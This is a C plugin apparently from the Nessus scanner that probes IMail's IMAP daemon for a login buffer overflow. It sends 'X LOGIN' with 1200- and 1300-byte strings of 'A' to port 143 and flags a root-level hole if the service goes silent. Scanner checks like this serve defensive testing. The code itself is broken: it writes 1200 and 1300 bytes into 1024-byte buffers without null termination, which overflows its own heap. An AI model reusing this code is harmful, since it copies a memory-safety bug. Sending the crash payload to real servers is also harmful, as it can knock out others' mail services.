/*
 * 
 * imail_imap
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>

#define NAME "IMail's Imapd buffer overflow"
#define DESC "\
The imapd login process does not do proper bounds\n\
checking on usernames and passwords.\n\n\
* OK IMAP4 Server (IMail 4.06)\n\
X LOGIN glob1 glob2\n\
\n\
Where glob1 is 1200 characters and glob2 is 1300\n\
characters. The imapd service will crash with the\n\
usual overflow error.\n\
Risk factor : high"
#define COPYRIGHT "found by the eEye Digital Security Team"
#define SUMM "IMail's imapd buffer overflow"



PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_GATHER_INFO);
	plug_set_family(desc, "Gain root remotely");
	return(0);
}

     

PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	int port = (int)plug_get_key(args, "Services/imap");
	if(!port)port = 143;
	
	if(host_get_port_state(args, port)>0)
	{
	 int soc = open_sock_tcp(args, port);
	 if(soc<0)return(0);
	 else
	 {
	  char * buf = emalloc(1024);
	  char * buf2 = emalloc(1024);
	  char * command;
	  memset(buf, 'A', 1200);
	  memset(buf2, 'A', 1300);
	  
	  command = emalloc(5000);
          recv_line(soc, command, 5000);
	  sprintf(command, "X LOGIN %s %s\n", buf, buf2);
	  efree(&buf2);
	  efree(&buf);
#ifndef NESSUS_NT
          signal(SIGPIPE, SIG_IGN);
#endif
	  send(soc, command, strlen(command),0);
	  recv_line(soc, command, 2048);
	  if(!strlen(command))
	   post_hole(args, port, 
"The remote imap is subject to a buffer overrun attack\n\
which may allow any remote user to become root easily\n");
	 efree(&command);
	 socket_close(soc);
	 }
	}
	return(0);
}
